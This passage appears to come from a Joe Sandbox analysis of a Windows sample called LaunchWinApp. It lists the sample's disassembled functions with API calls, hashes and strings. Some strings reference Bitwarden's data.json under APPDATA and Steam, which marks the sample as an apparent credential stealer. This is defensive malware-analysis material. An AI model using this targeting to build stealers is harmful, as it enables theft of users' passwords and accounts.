                    • Opcode ID: 935f3f92e6eb2062e79fa94cff32ac5529cb67a9a7e38a833745fec4569356fe
                    • Instruction ID: 7b07bbd8c9a74637b8ff1164013ca671d265103f7aa1fb6be52097d27865991e
                    • Opcode Fuzzy Hash: 935f3f92e6eb2062e79fa94cff32ac5529cb67a9a7e38a833745fec4569356fe
                    • Instruction Fuzzy Hash: 0DB1AC71C05248DACF04DFE5C5A1AEDFBB1AF58308F24416EE41577282DB381A8ACB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustPointer
                    • String ID: \1A
                    • API String ID: 1740715915-1566668914
                    • Opcode ID: c9d369d6c2daa6797e92e57192e48a54b08b3e5244cb9b01516749d306acba83
                    • Instruction ID: 3b078b88737ffcefddf704eb09056645e977f10e4359ae659fe6a6c38e73a9b1
                    • Opcode Fuzzy Hash: c9d369d6c2daa6797e92e57192e48a54b08b3e5244cb9b01516749d306acba83
                    • Instruction Fuzzy Hash: 0851E371A01702AFFB259F15D881B6AB7B4FF14B16F24052FE80247291D739EE85CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prologInitstd::locale::_
                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                    • API String ID: 3423815975-1866435925
                    • Opcode ID: 5df9408edca245710e904724637e42faa8fa3b92a83947886b4b9e4734cc67d6
                    • Instruction ID: 8dabb1f538289b519b9cd29bdb6115fabdc5829d5a190bf1b6cac908ee3f737f
                    • Opcode Fuzzy Hash: 5df9408edca245710e904724637e42faa8fa3b92a83947886b4b9e4734cc67d6
                    • Instruction Fuzzy Hash: EF21DBB2900704BFD700DF59D882B99F7A4FB04314F20853FE909A7681E7B9A9508BDD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog
                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$m_it.array_iterator != m_object->m_value.array->end()$m_it.object_iterator != m_object->m_value.object->end()$m_object != nullptr
                    • API String ID: 3519838083-3557933457
                    • Opcode ID: 17ba67ccae13c10c904f1db2fcf17925a53df4072d78637923f835ba692696a2
                    • Instruction ID: 0017af9e6d2c49271430114ab1e0aad326fcc0ffdae2a020be648607e4c20502
                    • Opcode Fuzzy Hash: 17ba67ccae13c10c904f1db2fcf17925a53df4072d78637923f835ba692696a2
                    • Instruction Fuzzy Hash: 1121F030B006409BC728EB59D896EEAB7A5EF81704F54802FE046A7691E779BD04CB1D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FreeLibrary.KERNEL32(00000000,?,?,?,00444FB8,?,?,0048D4AC,00000000,?,004450E3,00000004,InitializeCriticalSectionEx,004707B4,InitializeCriticalSectionEx,00000000), ref: 00444F87
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeLibrary
                    • String ID: api-ms-
                    • API String ID: 3664257935-2084034818
                    • Opcode ID: 604e49e76cd0c6a5586cd97f15cfa2aa341845e513ab46da451ae716670c7f5b
                    • Instruction ID: 1f972a5013132b9a2514da2768aa34ae16f3e64387eee4a1259ae6c821b090d3
                    • Opcode Fuzzy Hash: 604e49e76cd0c6a5586cd97f15cfa2aa341845e513ab46da451ae716670c7f5b
                    • Instruction Fuzzy Hash: 5411E931E41621ABFB225B689C44B5A73989F81770F150222F904EB3D0D778ED0986ED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _free.LIBCMT ref: 0045FD5A
                    • _free.LIBCMT ref: 0045FF26
                    • _free.LIBCMT ref: 0045FF9E
                    • GetTimeZoneInformation.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,0046015F,?,?,00000000), ref: 0045FFB0
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$InformationTimeZone
                    • String ID:
                    • API String ID: 597776487-0
                    • Opcode ID: 5b5c36463914b60fada14f4c77f04e29bbec69af042e17b559968db5563f0ab1
                    • Instruction ID: 3b6509a3aaa5cb4486c51181d3b77dbc3df959ff6deecf67bcce13ac11779d85
                    • Opcode Fuzzy Hash: 5b5c36463914b60fada14f4c77f04e29bbec69af042e17b559968db5563f0ab1
                    • Instruction Fuzzy Hash: 3FA10572D00215ABDB10AF65DC42AAF77B9EF01314F10447FFC01A7292EB789E09875A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __alloca_probe_16.LIBCMT ref: 0045A652
                    • __alloca_probe_16.LIBCMT ref: 0045A718
                    • __freea.LIBCMT ref: 0045A784
                      • Part of subcall function 0045A421: RtlAllocateHeap.NTDLL(00000000,0043FE4F,00000000,?,00441C9B,00000002,00000000,?,tI3iZ,?,0040A956,0043FE4F,00000004,00000000,00000000,00000000), ref: 0045A453
                    • __freea.LIBCMT ref: 0045A78D
                    • __freea.LIBCMT ref: 0045A7B0
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                    • String ID:
                    • API String ID: 1423051803-0
                    • Opcode ID: f8a4c183bbedd41610f5d02485e4a49b04d78d62b21bce046194336a3891d7f8
                    • Instruction ID: e914f13bd4f781b9195ba76ab96e16fcc9f3b587ae55c9456e40ae077c7670cd
                    • Opcode Fuzzy Hash: f8a4c183bbedd41610f5d02485e4a49b04d78d62b21bce046194336a3891d7f8
                    • Instruction Fuzzy Hash: 7A51F9725001066FEB209F65CC41EBF37B9DF44755F19422AFD04A7242E73CDC6986AA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,00000000), ref: 0043E6CF
                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,00000000), ref: 0043E700
                    • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0043E666,00000000,00000000), ref: 0043E72F
                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0043E666), ref: 0043E73D
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043E76F
                      • Part of subcall function 0043E1EE: GetFileInformationByHandle.KERNEL32(?,?), ref: 0043E202
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Time$Pointer$HandleInformationLocalSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID:
                    • API String ID: 89576305-0
                    • Opcode ID: a97c9d76b1311824f083ed3e047e25bd65e297262963cd6987ab4e5ad68f95f5
                    • Instruction ID: ef1310bff113cda712694c82db917a5c0f64994a0e324728486c45fde73ae1a2
                    • Opcode Fuzzy Hash: a97c9d76b1311824f083ed3e047e25bd65e297262963cd6987ab4e5ad68f95f5
                    • Instruction Fuzzy Hash: 95315E76500B04AFDB25DF6AC885AABBBE8FF48314F00492EF596C2750E774A944CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetFileAttributesA.KERNEL32 ref: 0041EF97
                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 0041EFA5
                    • _strcat.LIBCMT ref: 0041F00B
                    • GetFileAttributesA.KERNEL32(00000000), ref: 0041F028
                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0041F03C
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesCreateDirectoryFile$_strcat
                    • String ID:
                    • API String ID: 2481838186-0
                    • Opcode ID: 7852bfbac150959f4e70604c0434f0458f3174453ce2b98333d25777c9a3b7e9
                    • Instruction ID: e3d341d44dc2a90c2cc9d48443a9322f804368b5e7d32a0cebebcc724c8842ff
                    • Opcode Fuzzy Hash: 7852bfbac150959f4e70604c0434f0458f3174453ce2b98333d25777c9a3b7e9
                    • Instruction Fuzzy Hash: 2211CC7990031467CF20866AAC88BCB7B5D8F46320F2002ABED50D3282D7B84DC7866D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _free.LIBCMT ref: 00461CB5
                      • Part of subcall function 0045813E: HeapFree.KERNEL32(00000000,00000000,?,00461F3E,?,00000000,?,00000002,?,004621E1,?,00000007,?,?,004625E2,?), ref: 00458154
                      • Part of subcall function 0045813E: GetLastError.KERNEL32(?,?,00461F3E,?,00000000,?,00000002,?,004621E1,?,00000007,?,?,004625E2,?,?), ref: 00458166
                    • _free.LIBCMT ref: 00461CC7
                    • _free.LIBCMT ref: 00461CD9
                    • _free.LIBCMT ref: 00461CEB
                    • _free.LIBCMT ref: 00461CFD
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 4f6779a0d28aeb5e5c08a1444330e3e82953e57d6866c30b29454afd17918678
                    • Instruction ID: aa683883e4bf9f92d5df4c7e7fdd7b4ad3d446d5baa26e2b2be0bdd6c7a0abf7
                    • Opcode Fuzzy Hash: 4f6779a0d28aeb5e5c08a1444330e3e82953e57d6866c30b29454afd17918678
                    • Instruction Fuzzy Hash: B9F0EC72544604ABC620DB59F68AC1EB3E9BA00751B980C1EF488E7A11DE38FC81875D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: *?
                    • API String ID: 269201875-2564092906
                    • Opcode ID: 7fa266a37d41f0b4a18f976dcdf544c7172ae4830185023379f90e57f63d4ead
                    • Instruction ID: b7153f1e9cd073f9a73f51101fdca5ca75928110e5a7738806b61394bae748ab
                    • Opcode Fuzzy Hash: 7fa266a37d41f0b4a18f976dcdf544c7172ae4830185023379f90e57f63d4ead
                    • Instruction Fuzzy Hash: 62616F75D002199FDB24CFA9C8815EEFBF5FF48314B24816AE845F7301EA35AE418B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0045A1CF: GetLastError.KERNEL32(?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000,00415155), ref: 0045A1D4
                      • Part of subcall function 0045A1CF: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000), ref: 0045A272
                    • _free.LIBCMT ref: 00452FC7
                    • _free.LIBCMT ref: 00452FF5
                    • _free.LIBCMT ref: 00453038
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorLast
                    • String ID: H1E
                    • API String ID: 3291180501-1092859847
                    • Opcode ID: bb9f89436ab2fbf003f44f64066b1f908fd4042066fa3ffe1476e3e2795e30ce
                    • Instruction ID: 59428e441042946987c7b26c97f00ffd105bc5ee51f0b5168e9e89f327d4970c
                    • Opcode Fuzzy Hash: bb9f89436ab2fbf003f44f64066b1f908fd4042066fa3ffe1476e3e2795e30ce
                    • Instruction Fuzzy Hash: 6F419A316002019FDB24DFADC881A6AB3F8EF09356B24066FE845D7396EB35ED149B44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 00418FFE
                      • Part of subcall function 00435C2D: __EH_prolog.LIBCMT ref: 00435C32
                      • Part of subcall function 00435C2D: _strcat.LIBCMT ref: 00435C8D
                      • Part of subcall function 00413E27: _Deallocate.LIBCONCRT ref: 00413E3C
                      • Part of subcall function 004360CE: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 0043611A
                      • Part of subcall function 004169F1: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000), ref: 00416A05
                      • Part of subcall function 004169F1: CreateDirectoryTransactedA.KERNEL32 ref: 00416A1E
                      • Part of subcall function 004169F1: CommitTransaction.KTMW32(00000000,?,00000000,00000000), ref: 00416A29
                      • Part of subcall function 00414005: _Deallocate.LIBCONCRT ref: 00414014
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateDeallocateH_prologTransaction$CommitDirectoryEnvironmentTransactedVariable_strcat
                    • String ID: APPDATA$\data.json$bitwarden
                    • API String ID: 178285706-3227786767
                    • Opcode ID: 757565255662bcb8f3071404d4112d11e0b1611896a7f9ac9c61d4877bae87ff
                    • Instruction ID: cca6550cebee4b1886801e926d5d5193d0ea27880837fc07405ff2b089349c37
                    • Opcode Fuzzy Hash: 757565255662bcb8f3071404d4112d11e0b1611896a7f9ac9c61d4877bae87ff
                    • Instruction Fuzzy Hash: 48419131D04709DFDF04EBE9E8556EDBBB1AF58314F14486FE00167281DB781A89CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog
                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr$steamstr
                    • API String ID: 3519838083-1786769808
                    • Opcode ID: 8c33a5cd72729253047e229faf75739d29221c32349492c5fd27e2724cd4d1c3
                    • Instruction ID: f9fb5fd95529f1e185078d4fdfb92a1590a3b113bb1c37e119bef744b12400ee
                    • Opcode Fuzzy Hash: 8c33a5cd72729253047e229faf75739d29221c32349492c5fd27e2724cd4d1c3
                    • Instruction Fuzzy Hash: 30212671A00215AFDB00DF69C991AEDF7B4FF49304F04852EE446E7391DBB8A905CBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wmemset$Deallocate
                    • String ID: tI3iZ
                    • API String ID: 1150821927-901813608
                    • Opcode ID: 1176fffbc2e1e897e38406ed78a6e181bd88a73329293da6ad30fefbd6583b02
                    • Instruction ID: a923f8d8dc02ef7f2375fb58b9147bee414587b024fa1c36fc0003c171cf3b2a
                    • Opcode Fuzzy Hash: 1176fffbc2e1e897e38406ed78a6e181bd88a73329293da6ad30fefbd6583b02
                    • Instruction Fuzzy Hash: B121BF71A00219FBCB05DF99D9818EE7BB8EF89354B10046EF805D7251DA359A60CBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 0040AE45
                      • Part of subcall function 0043F3DC: FormatMessageA.KERNEL32(00001300,00000000,?,00000000,?,00000000,00000000), ref: 0043F3F2
                    • LocalFree.KERNEL32(0000000F,unknown error,0000000D), ref: 0040AE8B
                    • LocalFree.KERNEL32(?), ref: 0040AEA4
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeLocal$FormatH_prologMessage
                    • String ID: unknown error
                    • API String ID: 252809769-3078798498
                    • Opcode ID: 48beb620b42efe1cea8a49862166a89641d6b2d407392d0d7b0f3139e5ab31d9
                    • Instruction ID: 9ce7e2eb81aba17c76f8b70531300c3dd8ae7105b2f83c44342febab76eb752e
                    • Opcode Fuzzy Hash: 48beb620b42efe1cea8a49862166a89641d6b2d407392d0d7b0f3139e5ab31d9
                    • Instruction Fuzzy Hash: 83012CB090020AAFDB11EF95C842AAEBBB5EF18344F10452FF845A6241D7789E548BA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • std::exception::exception.LIBCMT ref: 00423160
                      • Part of subcall function 0040A95F: ___std_exception_copy.LIBVCRUNTIME ref: 0040A97D
                    • std::exception::exception.LIBCMT ref: 00423178
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::exception::exception$___std_exception_copy
                    • String ID: q+B$q+B
                    • API String ID: 3231571295-216669670
                    • Opcode ID: 63ed1c145fe7101c16639f89d1d09fb18d36b29804e3bf756a26b6eed2981519
                    • Instruction ID: 9ba01f656cd83962fb6d13deca0475d5e9d630b8d9007430a74e89e29ebbb13f
                    • Opcode Fuzzy Hash: 63ed1c145fe7101c16639f89d1d09fb18d36b29804e3bf756a26b6eed2981519
                    • Instruction Fuzzy Hash: 5BE04FB62003046B8704EF5AD8C5897BBACFA45334300856BED188B602E7B4E8248BE5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: 5c667b85c69b247d78eb8e6d2296893e72aa73b50319df106e1a4e569776d5bb
                    • Instruction ID: 9f7a541f25a157c5af60ffd646695aa33dc9ad79aa300298d08acb1ede90cce6
                    • Opcode Fuzzy Hash: 5c667b85c69b247d78eb8e6d2296893e72aa73b50319df106e1a4e569776d5bb
                    • Instruction Fuzzy Hash: A3B124729003459FDB118F68C8D1BBEBBA5EF56345F1481ABEC40AB343D6388D46CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 0041A054
                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 0041A093
                    • PathCombineW.SHLWAPI(?,?,?), ref: 0041A0AD
                    • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,00000000), ref: 0041A276
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Path$CombineFolderH_prologSpeciallstrlen
                    • String ID:
                    • API String ID: 1700979297-0
                    • Opcode ID: ed3076c104523d15bd630f8dd49e5c27a666ae2a41963204847502a84eca748b
                    • Instruction ID: 6f96879139151c76972fa8d07f1843588cb11ebddc76d808691517a85e7824ba
                    • Opcode Fuzzy Hash: ed3076c104523d15bd630f8dd49e5c27a666ae2a41963204847502a84eca748b
                    • Instruction Fuzzy Hash: 5DC16D71D01218DFCF14DFA5C995AEEBBB5BF48304F1041AEE006A7292EB385A85CF59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0000005C,00000001,?,00000048,00000000,00000000,?,?), ref: 0040D7E4
                    • HeapFree.KERNEL32(00000000), ref: 0040D7EB
                      • Part of subcall function 00414005: _Deallocate.LIBCONCRT ref: 00414014
                    • __EH_prolog.LIBCMT ref: 0040DA4B
                    • GetProcAddress.KERNEL32(?,?), ref: 0040DA96
                    • GetProcAddress.KERNEL32(?,?), ref: 0040DAC8
                    • GetProcAddress.KERNEL32(?,?), ref: 0040DB07
                    • GetProcAddress.KERNEL32(?,?), ref: 0040DB3F
                    • GetProcAddress.KERNEL32(?,?), ref: 0040DB74
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Heap$DeallocateFreeH_prologProcess
                    • String ID: H$\
                    • API String ID: 1925248606-318634259
                    • Opcode ID: f407b825f62a8ef3110e9ce4a618d3d409f52cfc8bbb517039a92d765ec5888e
                    • Instruction ID: 642f4277c16dce2f1227e3874dfd8be08d6dfdaa441062478a708fd71b18c494
                    • Opcode Fuzzy Hash: f407b825f62a8ef3110e9ce4a618d3d409f52cfc8bbb517039a92d765ec5888e
                    • Instruction Fuzzy Hash: 42619F71C002089EEB14DFE5C985BEEBBB4AF54304F10416EE516772D1EB785A88CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ce739833e46dd935646128a7a7a042a61a9e71d8826cabea8a703834685a6cd0
                    • Instruction ID: ebbfa018b64cbc29944482e986f3a274ccb63ebfe67a27d5501d362e2acee0b3
                    • Opcode Fuzzy Hash: ce739833e46dd935646128a7a7a042a61a9e71d8826cabea8a703834685a6cd0
                    • Instruction Fuzzy Hash: 6C4147B1A00704AFE7249F38CD41B9BBBE8EB89755F10862FF501DB382D7B999448784
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _free.LIBCMT ref: 004676BE
                    • _free.LIBCMT ref: 004676E7
                    • SetEndOfFile.KERNEL32(00000000,00464C11,00000000,0045B393,?,?,?,?,?,?,?,00464C11,0045B393,00000000), ref: 00467719
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00464C11,0045B393,00000000,?,?,?,?,00000000), ref: 00467735
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFileLast
                    • String ID:
                    • API String ID: 1547350101-0
                    • Opcode ID: bd33fe4accf8230b4276695ed5458ad8bbe0b64287cddc4c831cf8b9a053bfaa
                    • Instruction ID: 4f1d2b4d1600efd1137089db14580955ed1175fe733d5dd49f56fc263a7a4ac4
                    • Opcode Fuzzy Hash: bd33fe4accf8230b4276695ed5458ad8bbe0b64287cddc4c831cf8b9a053bfaa
                    • Instruction Fuzzy Hash: C141D972504A05ABDB11AB6ECC42A9E77A5AF44379F24011BF814E7292FA3CD841876F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0043F49F: CopyFileW.KERNEL32(?,?,00000000,?,?,?,0043F789,?,?,00000000), ref: 0043F4AF
                    • CreateFileW.KERNEL32(?,00000081,00000000,00000000,00000003,00000000,00000000,?,?,00000001), ref: 0043F6AF
                    • GetLastError.KERNEL32 ref: 0043F6BC
                      • Part of subcall function 0043F4D4: CloseHandle.KERNEL32(000000FF,?,0043FB9C,?,?,?,00000080,?), ref: 0043F4E0
                    • CreateFileW.KERNEL32(?,00000082,00000000,00000000,00000003,00000000,00000000), ref: 0043F6ED
                    • GetLastError.KERNEL32 ref: 0043F6FA
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CreateErrorLast$CloseCopyHandle
                    • String ID:
                    • API String ID: 1748377786-0
                    • Opcode ID: 70b73d5e03736ca376b42552640f1d66ba9f79bcc1fd9a060e141f0308d4f9ed
                    • Instruction ID: 184a5eeaf27ed35f668ac0a16820d7a5bc1a3cc7be777b0d33307f1342130ad7
                    • Opcode Fuzzy Hash: 70b73d5e03736ca376b42552640f1d66ba9f79bcc1fd9a060e141f0308d4f9ed
                    • Instruction Fuzzy Hash: D331C230E00259BEEB11AAB99C81CBF76BCAF2C710F005576FD20D6292D7788D0D8769
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ___std_fs_open_handle@16.LIBCPMT ref: 004163D3
                    • ___std_fs_read_reparse_data_buffer@12.LIBCPMT ref: 0041640D
                      • Part of subcall function 0043FC3C: DeviceIoControl.KERNEL32 ref: 0043FC57
                      • Part of subcall function 0043FC3C: GetLastError.KERNEL32(?,00416412,?,00000000,00004002,?,?,00000080,02200000), ref: 0043FC61
                    • ___std_fs_get_file_attributes_by_handle@8.LIBCPMT ref: 00416439
                      • Part of subcall function 0043F4D4: CloseHandle.KERNEL32(000000FF,?,0043FB9C,?,?,?,00000080,?), ref: 0043F4E0
                    • ___std_fs_read_name_from_reparse_data_buffer@12.LIBCPMT ref: 00416474
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseControlDeviceErrorHandleLast___std_fs_get_file_attributes_by_handle@8___std_fs_open_handle@16___std_fs_read_name_from_reparse_data_buffer@12___std_fs_read_reparse_data_buffer@12
                    • String ID:
                    • API String ID: 719998554-0
                    • Opcode ID: a3bd12f74103efc5ee1c60b121052fe3a39ef897c4367bc356992702c50184e8
                    • Instruction ID: 3fcc9c7eadc76e3c3294fdbb1203b64cddf9cb62e05918cc9d16f8141d559d9a
                    • Opcode Fuzzy Hash: a3bd12f74103efc5ee1c60b121052fe3a39ef897c4367bc356992702c50184e8
                    • Instruction Fuzzy Hash: 6D319032D00619BADB11EBE59C41DEFB7B8AF04314F16017BF600B6242DB38DA8587AD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00451F00: _free.LIBCMT ref: 00451F0E
                      • Part of subcall function 0045B5E8: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,0045A77A,?,00000000,00000000), ref: 0045B694
                    • GetLastError.KERNEL32 ref: 0046029C
                    • __dosmaperr.LIBCMT ref: 004602A3
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 004602E2
                    • __dosmaperr.LIBCMT ref: 004602E9
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
